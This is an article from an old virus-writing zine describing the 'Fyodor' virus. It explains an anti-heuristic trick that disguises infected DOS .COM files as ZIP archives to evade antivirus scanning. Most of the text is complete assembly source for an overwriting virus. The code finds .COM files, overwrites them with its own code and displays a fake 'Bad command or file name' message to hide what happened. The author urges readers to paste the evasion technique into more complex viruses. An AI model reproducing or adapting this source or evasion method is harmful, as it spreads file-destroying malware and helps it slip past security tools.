Copy Link
Add to Bookmark
Report
SLAM2.024: A Funky New Anti-Heuristic Method - The Fyodor Virus
The Fyodor Virus
by Gothmog/DHA
This virus uses an interesting anti-heuristic technique - infected files masquerade as .ZIP format files. To do this, the virus starts with a dummy 22-byte ZIP file header, which disassembles to do-nothing instructions which fortunately do not crash the processor:
[cs]:0100 50 PUSH AX
[cs]:0101 4B DEC BX
[cs]:0102 050600 ADD AX,0006
[cs]:0105 0000 ADD [BX+SI],AL
[cs]:0107 0000 ADD [BX+SI],AL
[cs]:0109 0000 ADD [BX+SI],AL
[cs]:010B 0000 ADD [BX+SI],AL
[cs]:010D 0000 ADD [BX+SI],AL
[cs]:010F 0000 ADD [BX+SI],AL
[cs]:0111 0000 ADD [BX+SI],AL
[cs]:0113 90 NOP
[cs]:0114 0000 ADD [BX+SI],AL
To a ZIP processor, the virus is stored as a ZIP comment, and the actual archive contains no files. In any case, this technique renders the virus invisible to TBAV, which flags only the `p' flag, for a packed file...
While this virus is nothing more than a featureless overwriter (I was testing the idea, so wrote it up _real_ quick...) the technique can easily be added to more complex viruses - just cut and paste!
==========================================================[ code begins ]==
.model tiny
.code
org 100h
virusStart:
db 50h, 4Bh, 05h, 06h, 00h, 00h, 00h, 00h, 00h, 00h, 00h
db 00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 90h, 00h, 00h
findFirst:
filemask db '*.com', 00h, 00h
mov byte ptr virusstart + 1, 'K'
mov ah, 4Eh
findFile:
xor cx, cx
mov dx, offset filemask
int 21h
jc writeMsg
openFile:
mov ax, 3D00h
mov dx, 9Eh
int 21h
xchg bx, ax
readFile:
mov ah,3fh
mov cx, 2
mov dx, offset buffer
int 21h
closeFile:
mov ah,3eh
int 21h
checkInfected:
cmp word ptr[buffer], 'KP'
jnz OpenFileAgain
mov ah,4fh
jmp findFile
Virus_Name db 'fyodor'
openFileAgain:
mov ax,3d02h
mov dx,9eh
int 21h
xchg bx,ax
infectFile:
mov ah, 40h
mov cx, offset virusEnd - offset virusStart
mov dx, offset virusStart
int 21h
closeFileAgain:
mov ah,3eh
int 21h
writeMsg:
mov dx, offset msgerror
mov ah,09h
int 21h
exit:
int 20h
msgerror db 'Bad command or file name', 13, 10, '$'
virusEnd:
buffer dw ?
end virusStart
; ============================================================[ code ends ]==